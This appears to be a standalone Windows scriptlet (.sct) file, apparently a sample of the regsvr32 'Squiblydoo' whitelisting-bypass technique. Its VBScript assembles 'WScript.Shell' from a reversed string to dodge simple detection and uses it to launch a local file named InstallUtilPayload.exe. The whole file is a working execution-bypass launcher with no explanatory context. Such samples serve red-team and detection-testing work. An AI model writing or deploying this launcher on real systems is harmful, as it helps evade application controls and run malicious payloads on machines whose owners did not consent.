<?XML version="1.0"?>
<scriptlet>

<registration
   description="Testit"
   progid="Testit"
   version="1.00"
   classid="{AAAA1111-0000-0000-0000-0000FEEDACAE}"
   remotable="true"
	>
</registration>

<script language="vbscript">
<![CDATA[

	test = StrReverse("llehS")
	Set r = CreateObject("WScript." & test)
	r.Run("C:\temp\InstallUtilPayload.exe")
	
	
]]>
</script>

</scriptlet>
